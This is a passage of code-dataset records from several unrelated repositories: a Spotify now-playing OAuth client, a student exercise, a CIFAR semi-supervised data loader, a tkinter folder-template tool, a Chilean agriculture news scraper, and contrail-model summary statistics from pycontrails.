f'http://localhost:{PORT}',\n        'code_challenge_method': 'S256',\n        'code_challenge': challenge,\n        'scope': 'user-read-currently-playing',\n    })\n\n    webbrowser.open(f'https://accounts.spotify.com/authorize?{query}')\n    response = await web.serve(PORT)\n    query = urllib.parse.parse_qs(urllib.parse.urlparse(response.path).query)\n    if 'error' in query:\n        return None\n\n    query = urllib.parse.urlencode({\n        'client_id': CLIENT_ID,\n        'grant_type': 'authorization_code',\n        'code': query['code'][0],\n        'redirect_uri': f'http://localhost:{PORT}',\n        'code_verifier': verifier,\n    })\n\n    data = await web.open('https://accounts.spotify.com/api/token', query.encode())\n    return json.loads(data.decode())\n\nasync def refresh(refresh_token):\n    query = urllib.parse.urlencode({\n        'grant_type': 'refresh_token',\n        'refresh_token': refresh_token,\n        'client_id': CLIENT_ID,\n    })\n\n    data = await web.open('https://accounts.spotify.com/api/token', query.encode())\n    return json.loads(data.decode())\n\nasync def try_open(access_token, url, data):\n    headers = { 'Authorization': f'Bearer {access_token}' }\n    return await web.open(url, data, headers)\n\nasync def open(url, data=None):\n    path = tempfile.gettempdir()\n    path = os.path.join(path, 'spotify')\n\n    with shelve.open(path) as db:\n        do_refresh = False\n        do_refresh = do_refresh or 'access_token' not in db\n        do_refresh = do_refresh or 'expires_at' not in db\n        do_refresh = do_refresh or time.time() > db['expires_at'] - 60\n\n        if not do_refresh:\n            try:\n                return await try_open(db['access_token'], url, data)\n            except:\n                do_refresh = True\n\n        do_auth = False\n        do_auth = do_auth or 'refresh_token' not in db\n\n        if not do_auth:\n            try:\n                tmp = await refresh(db['refresh_token'])\n            except:\n                do_auth = True\n\n        if do_auth:\n            tmp = await auth()\n\n        db['refresh_token'] = tmp['refresh_token']\n        db['access_token'] = tmp['access_token']\n        db['expires_at'] = tmp['expires_in'] + time.time()\n\n        return await try_open(db['access_token'], url, data)\n\nasync def poll():\n    data = await open('https://api.spotify.com/v1/me/player/currently-playing')\n    if data != b'':\n        return json.loads(data.decode())\n    else:\n        return None","repo_name":"DutChen18/lyrics","sub_path":"spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1316941906","text":"'''\nWrite a function that finds the difference between the sum of all even numbers and the sum of all odd\nnumbers among num_limit randomly generated numbers in a given numeric range,\ni.e. 
subtract the sum of the odd numbers from the sum of the even numbers.\n\t\tdef diff_even_odd(num_limit, lower_bound, upper_bound): # returns int\n\t\t    pass\n'''\nimport random\ndef diff_even_odd(num_limit, lower_bound, upper_bound):\n    nums = random.sample(range(lower_bound, upper_bound), num_limit)\n    even_nums = [i for i in nums if i % 2 == 0]\n    odd_nums = [i for i in nums if i % 2 != 0]\n    diff = sum(even_nums) - sum(odd_nums)\n    print('Difference between the sums is:', diff)\n    return nums, even_nums, odd_nums, diff\nresult = diff_even_odd(20, 1, 30)\nprint(result)\nprint('The End')","repo_name":"AlexGoAhead/hw","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13487306184","text":"import logging\nimport math\n\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import datasets\nfrom torchvision import transforms\n\nfrom .randaugment import RandAugmentMC\n\nimport torch\nfrom torch import nn\nfrom torchvision.transforms import transforms\n\nlogger = logging.getLogger(__name__)\n\ncifar10_mean = (0.4914, 0.4822, 0.4465)\ncifar10_std = (0.2471, 0.2435, 0.2616)\ncifar100_mean = (0.5071, 0.4867, 0.4408)\ncifar100_std = (0.2675, 0.2565, 0.2761)\nnormal_mean = (0.5, 0.5, 0.5)\nnormal_std = (0.5, 0.5, 0.5)\n\n\n\n\n\ndef get_cifar10(args, root, active_index = None):\n    transform_labeled = transforms.Compose([\n        transforms.RandomHorizontalFlip(),\n        transforms.RandomCrop(size=32,\n                              padding=int(32*0.125),\n                              padding_mode='reflect'),\n        transforms.ToTensor(),\n        transforms.Normalize(mean=cifar10_mean, std=cifar10_std)\n    ])\n    transform_val = transforms.Compose([\n        transforms.ToTensor(),\n        transforms.Normalize(mean=cifar10_mean, std=cifar10_std)\n    ])\n    base_dataset = datasets.CIFAR10(root, train=True, download=True)\n\n    train_labeled_idxs, train_unlabeled_idxs, labeled_idxs_org = x_u_split(\n        args, base_dataset.targets, active_index)\n\n    train_labeled_dataset = CIFAR10SSL(\n        root, train_labeled_idxs, train=True,\n        transform=transform_labeled)\n\n    train_unlabeled_dataset = CIFAR10SSL(\n        root, train_unlabeled_idxs, train=True,\n        transform=TransformFixMatch(mean=cifar10_mean, std=cifar10_std))\n\n    train_labeled_sim_dataset = CIFAR10SSL(\n        root, train_labeled_idxs, train=True,\n        transform=ContrastiveLearningViewGenerator(32,args.n_views))\n    \n    \n    train_unlabeled_sim_dataset = CIFAR10SSL(\n        root, train_unlabeled_idxs, train=True,\n        transform=ContrastiveLearningViewGenerator(32,args.n_views))\n\n\n    test_dataset = datasets.CIFAR10(\n        root, train=False, transform=transform_val, download=False)\n\n    return train_labeled_dataset, train_unlabeled_dataset, test_dataset, labeled_idxs_org, train_unlabeled_sim_dataset, train_labeled_sim_dataset\n\n\ndef get_cifar100(args, root, active_index = None):\n\n    transform_labeled = transforms.Compose([\n        transforms.RandomHorizontalFlip(),\n        transforms.RandomCrop(size=32,\n                              padding=int(32*0.125),\n                              padding_mode='reflect'),\n        transforms.ToTensor(),\n        transforms.Normalize(mean=cifar100_mean, std=cifar100_std)])\n\n    transform_val = transforms.Compose([\n        transforms.ToTensor(),\n        transforms.Normalize(mean=cifar100_mean, std=cifar100_std)])\n\n    base_dataset = datasets.CIFAR100(\n        root, train=True, download=True)\n\n    train_labeled_idxs, train_unlabeled_idxs, labeled_idxs_org = x_u_split(\n        args, base_dataset.targets, active_index)\n\n    train_labeled_dataset = CIFAR100SSL(\n        root, train_labeled_idxs, train=True,\n        transform=transform_labeled)\n\n    
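The x_u_split helper used by these getters boils down to sampling a fixed set of labeled indices and oversampling it so one epoch yields full batches. A condensed sketch of that idea (sizes and the function name are illustrative, not the module's exact behaviour):

import numpy as np

def tiny_split(labels, num_labeled, batches_per_epoch, batch_size, seed=12345):
    rng = np.random.default_rng(seed)
    labeled_idx = rng.choice(len(labels), size=num_labeled, replace=False)
    unlabeled_idx = np.arange(len(labels))  # FixMatch keeps all data on the unlabeled side
    # Repeat the small labeled set so one epoch yields batches_per_epoch full batches.
    repeats = int(np.ceil(batch_size * batches_per_epoch / num_labeled))
    expanded = np.tile(labeled_idx, repeats)
    rng.shuffle(expanded)
    return expanded, unlabeled_idx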
train_unlabeled_dataset = CIFAR100SSL(\n root, train_unlabeled_idxs, train=True,\n transform=TransformFixMatch(mean=cifar100_mean, std=cifar100_std))\n\n train_labeled_sim_dataset = CIFAR100SSL(\n root, train_labeled_idxs, train=True,\n transform=ContrastiveLearningViewGenerator(32,args.n_views))\n \n \n train_unlabeled_sim_dataset = CIFAR100SSL(\n root, train_unlabeled_idxs, train=True,\n transform=ContrastiveLearningViewGenerator(32,args.n_views)) \n \n\n test_dataset = datasets.CIFAR100(\n root, train=False, transform=transform_val, download=False)\n\n return train_labeled_dataset, train_unlabeled_dataset, test_dataset, labeled_idxs_org, train_unlabeled_sim_dataset, train_labeled_sim_dataset\n\n\ndef x_u_split(args, labels, act_index = None):\n if act_index is None:\n labels = np.array(labels)\n labeled_idx = []\n # unlabeled data: all data (https://github.com/kekmodel/FixMatch-pytorch/issues/10)\n unlabeled_idx = np.array(range(len(labels)))\n \n idx = np.arange(len(labels))\n idx = np.random.choice(idx, args.num_labeled, False)\n labeled_idx.extend(idx)\n\n labeled_idx = np.array(labeled_idx)\n assert len(labeled_idx) == args.num_labeled\n labeled_idx_org = labeled_idx\n labeled_num = args.num_labeled\n if args.expand_labels or args.num_labeled < args.batch_size:\n num_expand_x = math.ceil(\n args.batch_size * args.eval_step / labeled_num) \n labeled_idx = np.hstack([labeled_idx for _ in range(num_expand_x)])\n \n else:\n labeled_idx = act_index\n unlabeled_idx = np.array(range(len(labels)))\n labeled_idx_org = labeled_idx\n labeled_num = act_index.shape[0]\n\n if args.expand_labels or args.num_labeled < args.batch_size:\n num_expand_x = math.ceil(\n args.batch_size * args.num_sample / labeled_num) \n \n if act_index is not None and act_index.shape[0] == args.stop_active:\n num_expand_x = math.ceil(\n args.batch_size * args.eval_step / args.stop_active)\n\n labeled_idx = np.hstack([labeled_idx for _ in range(num_expand_x)])\n np.random.shuffle(labeled_idx)\n\n return labeled_idx, unlabeled_idx, labeled_idx_org\n\n\nclass TransformFixMatch(object):\n def __init__(self, mean, std):\n self.weak = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect')])\n self.strong = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect'),\n RandAugmentMC(n=2, m=10)])\n self.normalize = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)])\n\n def __call__(self, x):\n weak = self.weak(x)\n strong = self.strong(x)\n return self.normalize(weak), self.normalize(strong)\n \n\n#def get_simclr_pipeline_transform(size, s=1):\n# \"\"\"Return a set of data augmentation transformations as described in the SimCLR paper.\"\"\"\n# color_jitter = transforms.ColorJitter(0.8 * s, 0.8 * s, 0.8 * s, 0.2 * s)\n# data_transforms = transforms.Compose([transforms.RandomResizedCrop(size=size),\n# transforms.RandomHorizontalFlip(),\n# transforms.RandomApply([color_jitter], p=0.8),\n# transforms.RandomGrayscale(p=0.2),\n# GaussianBlur(kernel_size=int(0.1 * size)),\n# transforms.ToTensor()])\n \nclass ContrastiveLearningViewGenerator(object):\n \"\"\"Take two random crops of one image as the query and key.\"\"\"\n\n def __init__(self, size, n_views=2):\n self.color_jitter = transforms.ColorJitter(0.8 * 1, 0.8 * 1, 0.8 * 1, 0.2 * 1) #s = 1; size = 32\n self.base_transform = 
transforms.Compose([transforms.RandomResizedCrop(size=size),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([self.color_jitter], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n GaussianBlur(kernel_size=int(0.1 * size)),\n transforms.ToTensor()])\n self.n_views = n_views\n\n def __call__(self, x):\n #return [self.base_transform(x) for i in range(self.n_views)]\n return self.base_transform(x), self.base_transform(x)\n\n\nclass CIFAR10SSL(datasets.CIFAR10):\n def __init__(self, root, indexs, train=True,\n transform=None, target_transform=None,\n download=False):\n super().__init__(root, train=train,\n transform=transform,\n target_transform=target_transform,\n download=download)\n if indexs is not None:\n self.data = self.data[indexs]\n self.targets = np.array(self.targets)[indexs]\n\n def __getitem__(self, index):\n img, target = self.data[index], self.targets[index]\n img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return img, target, index\n\n\nclass CIFAR100SSL(datasets.CIFAR100):\n def __init__(self, root, indexs, train=True,\n transform=None, target_transform=None,\n download=False):\n super().__init__(root, train=train,\n transform=transform,\n target_transform=target_transform,\n download=download)\n if indexs is not None:\n self.data = self.data[indexs]\n self.targets = np.array(self.targets)[indexs]\n\n def __getitem__(self, index):\n img, target = self.data[index], self.targets[index]\n img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return img, target, index\n\n\nclass GaussianBlur(object):\n \"\"\"blur a single image on CPU\"\"\"\n def __init__(self, kernel_size):\n radias = kernel_size // 2\n kernel_size = radias * 2 + 1\n self.blur_h = nn.Conv2d(3, 3, kernel_size=(kernel_size, 1),\n stride=1, padding=0, bias=False, groups=3)\n self.blur_v = nn.Conv2d(3, 3, kernel_size=(1, kernel_size),\n stride=1, padding=0, bias=False, groups=3)\n self.k = kernel_size\n self.r = radias\n\n self.blur = nn.Sequential(\n nn.ReflectionPad2d(radias),\n self.blur_h,\n self.blur_v\n )\n\n self.pil_to_tensor = transforms.ToTensor()\n self.tensor_to_pil = transforms.ToPILImage()\n\n def __call__(self, img):\n img = self.pil_to_tensor(img).unsqueeze(0)\n\n sigma = np.random.uniform(0.1, 2.0)\n x = np.arange(-self.r, self.r + 1)\n x = np.exp(-np.power(x, 2) / (2 * sigma * sigma))\n x = x / x.sum()\n x = torch.from_numpy(x).view(1, -1).repeat(3, 1)\n\n self.blur_h.weight.data.copy_(x.view(3, 1, self.k, 1))\n self.blur_v.weight.data.copy_(x.view(3, 1, 1, self.k))\n\n with torch.no_grad():\n img = self.blur(img)\n img = img.squeeze()\n\n img = self.tensor_to_pil(img)\n\n return img\n\n\n\nDATASET_GETTERS = {'cifar10': get_cifar10,\n 'cifar100': get_cifar100}\n","repo_name":"Genj1Kai/ActiveMatch","sub_path":"dataset/cifar.py","file_name":"cifar.py","file_ext":"py","file_size_in_byte":11013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"15620424994","text":"import shutil\nfrom tkinter import *\nimport os\n\nshablons = {\n 'Семейства': ['00_ID', '01_КП', '02_Договор', '03_ТЗ', '04_Рабочая', '05_Экспорт'],\n 'Моделирование': ['00_ID', '01_КП']\n\n}\n\n# files = {\n# 'Семейства': [['00_ID', 'test11.txt'], ['00_ID', 'test21.txt'],\n# ['01_КП', 'test31.txt'], ['01_КП', 
'test41.txt']\n#                   ],\n#     'Моделирование': [['00_ID', 'test12.txt'], ['00_ID', 'test22.txt'],\n#                       ['01_КП', 'test32.txt'], ['01_КП', 'test42.txt']\n#                       ],\n#\n#\n#\n# }\n\ndef copy(directory, new_directory):\n    # normalised path to the files\n    directory = os.path.abspath(directory)\n\n    # objects in the folder\n    object_in_folder = os.listdir(directory)\n\n    # iterate over the objects and check: file or folder\n    for object in object_in_folder:\n        way = directory + '\\\\' + object\n\n        # if the path points to a file:\n        if os.path.isfile(way) == True:\n            file = object\n            try:\n                new_directory = path + '\\\\' + '\\\\'.join(way.split('\\\\')[-2:])\n                shutil.copyfile(way, new_directory)\n            except:\n                pass\n\n            # # is the file in the list\n            # for i in allNames:\n            #     if i[1] == file:\n            #         print(file)\n            #         name_new = i[0]\n            #         try:\n            #             os.rename(directory + '\\\\' + file, directory + '\\\\' + name_new)\n            #             break\n            #         except FileExistsError:\n            #             break\n        # if the path points to a folder\n        else:\n            copy(way, new_directory)\n\n\n\n\n\nsource_ways = r\"\\\\dc\\Bim\\08_Общая\\00_BIM_JUNIOR\\03_Рабочая\\Roma\\createfolder\"\n\nprint(os.listdir(source_ways))\n\n\n\n\nroot = Tk()\nroot.title(\"Graphical program in Python\")\nroot.geometry(\"350x300\")\n\n\nentry = Entry(width=20)  # text input field\ncreate = Button(text=\"Create\", command=root.destroy)  # create button\nvariable = StringVar(root)  # drop-down menu\nvariable.set(list(shablons.keys())[0])  # default value\ncvar1 = BooleanVar()  # checkbox\ncvar1.set(0)\nflag = Checkbutton(text=\"Copy templates\", variable=cvar1, onvalue=1, offvalue=0)\n\n\nw = OptionMenu(root, variable, *list(shablons.keys()))\nprint(w)\n\ndef entrydirectory(event):\n    directory = entry.get()\n    global path\n    path = directory\n\n\n    # return directory\n\n\n\n\ncreate.bind('<Button-1>', entrydirectory)\n# path = entryDirectory\n\n\n\nprint(cvar1.get())\n\n\n# entry.place()\n\n# w.place(relx=0.5, rely=0.5)\n# flag.place(relx=0.5, rely=0.65) #anchor=W\n# create.place(relx=0.7, rely=0.8)\n\n\nLabel(text='Path:').grid(row=1, column=0, sticky=W, padx=10, pady=10)\nLabel(text='Work type:').grid(row=2, column=0, sticky=W, padx=10, pady=10)\nentry.grid(row=1, column=1, sticky=W+E, padx=10, pady=10)\nw.grid(row=2, column=1, padx=10, sticky=W+E, pady=10)  # drop-down menu\nflag.grid(row=3, column=1, padx=10, pady=10)  #anchor=W\n\ncreate.grid(row=4, column=2, padx=10, pady=50)\n\n# create.pack()\nroot.mainloop()\n\n\n\n# print(list(files.keys()))\n\n\n\n\n\n\n\ntag = variable.get()  # read the tag from the drop-down menu\n# path = r'C:\\Users\\r.enikeev\\Desktop\\Новая папка'\n\n\n\n# tag = 'Моделирование'\n\n\n\ntry:\n    for folder in shablons[tag]:\n        directory_of_folder = path + '\\\\' + folder\n        os.mkdir(directory_of_folder)\nexcept OSError:\n    print(\"Creation of the directory %s failed\" % path)\nelse:\n    print(\"Successfully created the directory %s \" % path)\n\n\nprint(directory_of_folder)\nprint(cvar1.get())\nif cvar1.get():\n    copy(source_ways, path)\n\n\n","repo_name":"RomanEnikeev/01.Scripts","sub_path":"01.Scripts/09.CreateFolder/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"8943196700","text":"from urllib.request import urlopen # import urlopen\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport logging \r\n\r\n
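The mkdir loop near the end of the folder-creation script above can be made idempotent; a hedged sketch using os.makedirs (the base path and template names are illustrative):

import os

def scaffold(base_dir, subfolders):
    for name in subfolders:
        # exist_ok avoids the OSError that the try/except above works around
        os.makedirs(os.path.join(base_dir, name), exist_ok=True)

# scaffold(r'C:\projects\demo', ['00_ID', '01_KP'])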
logging.basicConfig(filename='minagri.log',\r\n                    filemode='a',format='%(asctime)s : %(levelname)s : %(message)s',\r\n                    datefmt='%d/%m/%y %H:%M:%S',\r\n                    level=logging.INFO)\r\nlogging.info('Scraper minagri')\r\nstart = time.process_time()\r\n\r\nurl_scraper = \"https://www.minagri.gob.cl/prensa/noticias/\"\r\nrequest_pagina = urlopen(url_scraper) # request the page\r\npagina_html = request_pagina.read() # read the response\r\nrequest_pagina.close()\r\nhtml_soup = BeautifulSoup(pagina_html, 'html.parser')# page and HTML parser\r\ncontenido_pagina = html_soup.find_all('article', class_=\"caluga-noticia\")\r\nhipervinculo_titulo = html_soup.find_all('div', class_=\"box-cuerpo-noticia-calugas\")\r\n\r\nfilename = 'minagri.csv'\r\nf = open(filename, 'w', encoding='utf-8')\r\nheaders = 'imagen, titulo, descripcion, temas, hipervinculo\\n'\r\nf.write(headers)\r\n\r\nfor cont in hipervinculo_titulo:\r\n    hipervinculo = cont.find('a').get('href')\r\nfor contenido in contenido_pagina:\r\n    imagen = contenido.find('img', class_=\"img-responsive\").get('src')\r\n    titulo = contenido.find('h5', class_=\"titulo-noticia\").text\r\n    categoria = contenido.find('a', rel = \"category tag\").text\r\n    descripcion = contenido.find('p', class_= \"box-cuerpo-noticia\").text\r\n    logging.info('News title: '+str(titulo))\r\n    f.write(titulo+\",\"+descripcion+\",\"+categoria+\",\"+str(imagen)+\",\"+str(hipervinculo))\r\n\r\nlogging.warning('Each title and date is individualised per news item')\r\nend = time.process_time()\r\nlogging.info('Total execution time: '+str(end - start))\r\nf.close() ","repo_name":"KarlaInostrozaUrbina/scrapers","sub_path":"scraper huertos/minagri-Daniel_Aguilera.py","file_name":"minagri-Daniel_Aguilera.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34415923053","text":"\"\"\"CoCiP output formats.\n\nThis module includes functions to produce additional output formats, including the:\n    (1) Flight waypoint outputs.\n        See :func:`flight_waypoint_summary_statistics`.\n    (2) Contrail flight summary outputs.\n        See :func:`contrail_flight_summary_statistics`.\n    (3) Gridded outputs.\n        See :func:`longitude_latitude_grid`.\n    (4) Time-slice statistics.\n        See :func:`time_slice_statistics`.\n    (5) Aggregate contrail segment optical depth/RF to a high-resolution longitude-latitude grid.\n        See :func:`contrails_to_hi_res_grid`.\n    (6) Increase spatial resolution of natural cirrus properties, required to estimate the\n        high-resolution contrail cirrus coverage for (5).\n        See :func:`natural_cirrus_properties_to_hi_res_grid`.\n\"\"\"\nfrom __future__ import annotations\n\nimport warnings\nfrom typing import Hashable\n\nimport numpy as np\nimport numpy.typing as npt\nimport pandas as pd\nimport xarray as xr\n\nfrom pycontrails.core.met import MetDataArray, MetDataset\nfrom pycontrails.core.vector import GeoVectorDataset, vector_to_lon_lat_grid\nfrom pycontrails.models.cocip.contrail_properties import contrail_edges, plume_mass_per_distance\nfrom pycontrails.models.cocip.radiative_forcing import albedo\nfrom pycontrails.models.humidity_scaling import HumidityScaling\nfrom pycontrails.models.tau_cirrus import tau_cirrus\nfrom pycontrails.physics import geo, units\nfrom pycontrails.physics.thermo import rho_d\n\n# -----------------------\n# Flight waypoint outputs\n# -----------------------\n\n\ndef flight_waypoint_summary_statistics(\n    flight_waypoints: GeoVectorDataset | pd.DataFrame,\n    contrails: GeoVectorDataset | pd.DataFrame,\n) -> GeoVectorDataset:\n    \"\"\"\n    Calculate the contrail summary statistics at each flight 
waypoint.\n\n Parameters\n ----------\n flight_waypoints : GeoVectorDataset | pd.DataFrame\n Flight waypoints that were used in :meth:`Cocip.eval` to produce ``contrails``.\n contrails : GeoVectorDataset | pd.DataFrame\n Contrail evolution outputs from CoCiP, :attr:`Cocip.contrail`\n\n Returns\n -------\n GeoVectorDataset\n Contrail summary statistics attached to each flight waypoint.\n\n Notes\n -----\n Outputs and units:\n - ``mean_contrail_altitude``, [:math:`m`]\n - ``mean_rhi``, [dimensionless]\n - ``mean_n_ice_per_m``, [:math:`m^{-1}`]\n - ``mean_r_ice_vol``, [:math:`m`]\n - ``mean_width``, [:math:`m`]\n - ``mean_depth``, [:math:`m`]\n - ``mean_tau_contrail``, [dimensionless]\n - ``mean_tau_cirrus``, [dimensionless]\n - ``max_age``, [:math:`h`]\n - ``mean_rf_sw``, [:math:`W m^{-2}`]\n - ``mean_rf_lw``, [:math:`W m^{-2}`]\n - ``mean_rf_net``, [:math:`W m^{-2}`]\n - ``ef``, [:math:`J`]\n - ``mean_olr``, [:math:`W m^{-2}`]\n - ``mean_sdr``, [:math:`W m^{-2}`]\n - ``mean_rsr``, [:math:`W m^{-2}`]\n \"\"\"\n # Aggregation map\n agg_map = {\n # Location, ambient meteorology and properties\n \"altitude\": \"mean\",\n \"rhi\": [\"mean\", \"std\"],\n \"n_ice_per_m\": [\"mean\", \"std\"],\n \"r_ice_vol\": \"mean\",\n \"width\": \"mean\",\n \"depth\": \"mean\",\n \"tau_contrail\": \"mean\",\n \"tau_cirrus\": \"mean\",\n \"age\": \"max\",\n # Radiative properties\n \"rf_sw\": \"mean\",\n \"rf_lw\": \"mean\",\n \"rf_net\": \"mean\",\n \"olr\": \"mean\",\n \"sdr\": \"mean\",\n \"rsr\": \"mean\",\n }\n if \"ef\" not in flight_waypoints:\n agg_map[\"ef\"] = \"sum\"\n\n # Check and pre-process `flights`\n if isinstance(flight_waypoints, GeoVectorDataset):\n flight_waypoints.ensure_vars([\"flight_id\", \"waypoint\"])\n flight_waypoints = flight_waypoints.dataframe\n\n flight_waypoints.set_index([\"flight_id\", \"waypoint\"], inplace=True)\n\n # Check and pre-process `contrails`\n if isinstance(contrails, GeoVectorDataset):\n contrail_vars = [\"flight_id\", \"waypoint\", \"formation_time\", *agg_map]\n contrail_vars.remove(\"age\")\n contrails.ensure_vars(contrail_vars)\n contrails = contrails.dataframe\n\n contrails[\"age\"] = (contrails[\"time\"] - contrails[\"formation_time\"]) / np.timedelta64(1, \"h\")\n\n # Calculate contrail statistics at each flight waypoint\n contrails = contrails.groupby([\"flight_id\", \"waypoint\"]).agg(agg_map)\n contrails.columns = (\n contrails.columns.get_level_values(1) + \"_\" + contrails.columns.get_level_values(0)\n )\n rename_cols = {\"mean_altitude\": \"mean_contrail_altitude\", \"sum_ef\": \"ef\"}\n contrails.rename(columns=rename_cols, inplace=True)\n\n # Concatenate to flight-waypoint outputs\n out = flight_waypoints.join(contrails, how=\"left\")\n out.reset_index(inplace=True)\n return GeoVectorDataset(out)\n\n\n# -------------------------------\n# Contrail flight summary outputs\n# -------------------------------\n\n\ndef contrail_flight_summary_statistics(flight_waypoints: GeoVectorDataset) -> pd.DataFrame:\n \"\"\"\n Calculate contrail summary statistics for each flight.\n\n Parameters\n ----------\n flight_waypoints : GeoVectorDataset\n Flight waypoint outputs with contrail summary statistics attached.\n See :func:`flight_waypoint_summary_statistics`.\n\n Returns\n -------\n pd.DataFrame\n Contrail summary statistics for each flight\n\n Notes\n -----\n Outputs and units:\n - ``total_flight_distance_flown``, [:math:`m`]\n - ``total_contrails_formed``, [:math:`m`]\n - ``total_persistent_contrails_formed``, [:math:`m`]\n - ``mean_lifetime_contrail_altitude``, 
[:math:`m`]\n    - ``mean_lifetime_rhi``, [dimensionless]\n    - ``mean_lifetime_n_ice_per_m``, [:math:`m^{-1}`]\n    - ``mean_lifetime_r_ice_vol``, [:math:`m`]\n    - ``mean_lifetime_contrail_width``, [:math:`m`]\n    - ``mean_lifetime_contrail_depth``, [:math:`m`]\n    - ``mean_lifetime_tau_contrail``, [dimensionless]\n    - ``mean_lifetime_tau_cirrus``, [dimensionless]\n    - ``mean_contrail_lifetime``, [:math:`h`]\n    - ``max_contrail_lifetime``, [:math:`h`]\n    - ``mean_lifetime_rf_sw``, [:math:`W m^{-2}`]\n    - ``mean_lifetime_rf_lw``, [:math:`W m^{-2}`]\n    - ``mean_lifetime_rf_net``, [:math:`W m^{-2}`]\n    - ``total_energy_forcing``, [:math:`J`]\n    - ``mean_lifetime_olr``, [:math:`W m^{-2}`]\n    - ``mean_lifetime_sdr``, [:math:`W m^{-2}`]\n    - ``mean_lifetime_rsr``, [:math:`W m^{-2}`]\n    \"\"\"\n    # Aggregation map\n    agg_map = {\n        # Contrail properties and ambient meteorology\n        \"segment_length\": \"sum\",\n        \"contrail_length\": \"sum\",\n        \"persistent_contrail_length\": \"sum\",\n        \"mean_contrail_altitude\": \"mean\",\n        \"mean_rhi\": \"mean\",\n        \"mean_n_ice_per_m\": \"mean\",\n        \"mean_r_ice_vol\": \"mean\",\n        \"mean_width\": \"mean\",\n        \"mean_depth\": \"mean\",\n        \"mean_tau_contrail\": \"mean\",\n        \"mean_tau_cirrus\": \"mean\",\n        \"max_age\": [\"mean\", \"max\"],\n        # Radiative properties\n        \"mean_rf_sw\": \"mean\",\n        \"mean_rf_lw\": \"mean\",\n        \"mean_rf_net\": \"mean\",\n        \"ef\": \"sum\",\n        \"mean_olr\": \"mean\",\n        \"mean_sdr\": \"mean\",\n        \"mean_rsr\": \"mean\",\n    }\n\n    # Check and pre-process `flight_waypoints`\n    vars_required = [\"flight_id\", \"sac\", *agg_map]\n    vars_required.remove(\"contrail_length\")\n    vars_required.remove(\"persistent_contrail_length\")\n    flight_waypoints.ensure_vars(vars_required)\n\n    flight_waypoints[\"contrail_length\"] = np.where(\n        flight_waypoints[\"sac\"] == 1.0, flight_waypoints[\"segment_length\"], 0.0\n    )\n\n    flight_waypoints[\"persistent_contrail_length\"] = np.where(\n        np.isnan(flight_waypoints[\"ef\"]), 0.0, flight_waypoints[\"segment_length\"]\n    )\n\n    # Calculate contrail statistics for each flight\n    flight_summary = flight_waypoints.dataframe.groupby([\"flight_id\"]).agg(agg_map)\n    flight_summary.columns = (\n        flight_summary.columns.get_level_values(1)\n        + \"_\"\n        + flight_summary.columns.get_level_values(0)\n    )\n\n    rename_flight_summary_cols = {\n        \"sum_segment_length\": \"total_flight_distance_flown\",\n        \"sum_contrail_length\": \"total_contrails_formed\",\n        \"sum_persistent_contrail_length\": \"total_persistent_contrails_formed\",\n        \"mean_mean_contrail_altitude\": \"mean_lifetime_contrail_altitude\",\n        \"mean_mean_rhi\": \"mean_lifetime_rhi\",\n        \"mean_mean_n_ice_per_m\": \"mean_lifetime_n_ice_per_m\",\n        \"mean_mean_r_ice_vol\": \"mean_lifetime_r_ice_vol\",\n        \"mean_mean_width\": \"mean_lifetime_contrail_width\",\n        \"mean_mean_depth\": \"mean_lifetime_contrail_depth\",\n        \"mean_mean_tau_contrail\": \"mean_lifetime_tau_contrail\",\n        \"mean_mean_tau_cirrus\": \"mean_lifetime_tau_cirrus\",\n        \"mean_max_age\": \"mean_contrail_lifetime\",\n        \"max_max_age\": \"max_contrail_lifetime\",\n        \"mean_mean_rf_sw\": \"mean_lifetime_rf_sw\",\n        \"mean_mean_rf_lw\": \"mean_lifetime_rf_lw\",\n        \"mean_mean_rf_net\": \"mean_lifetime_rf_net\",\n        \"sum_ef\": \"total_energy_forcing\",\n        \"mean_mean_olr\": \"mean_lifetime_olr\",\n        \"mean_mean_sdr\": \"mean_lifetime_sdr\",\n        \"mean_mean_rsr\": \"mean_lifetime_rsr\",\n    }\n\n    flight_summary.rename(columns=rename_flight_summary_cols, inplace=True)\n    return flight_summary.reset_index([\"flight_id\"])
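\n\n\n# The two helpers above are designed to be chained: attach per-waypoint contrail\n# statistics to the flight waypoints first, then collapse them to one row per\n# flight. The sketch below is illustrative only: ``fl_out`` and ``contrail`` are\n# assumed to be the ``Cocip.eval`` output and :attr:`Cocip.contrail` from the\n# same run.\n\n\ndef _example_flight_summary(fl_out, contrail):\n    \"\"\"Chain the waypoint- and flight-level summary helpers (illustrative sketch).\"\"\"\n    # Per-waypoint contrail statistics joined back onto the flight waypoints\n    waypoints = flight_waypoint_summary_statistics(fl_out, contrail)\n    # One summary row per flight_id\n    return contrail_flight_summary_statistics(waypoints)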
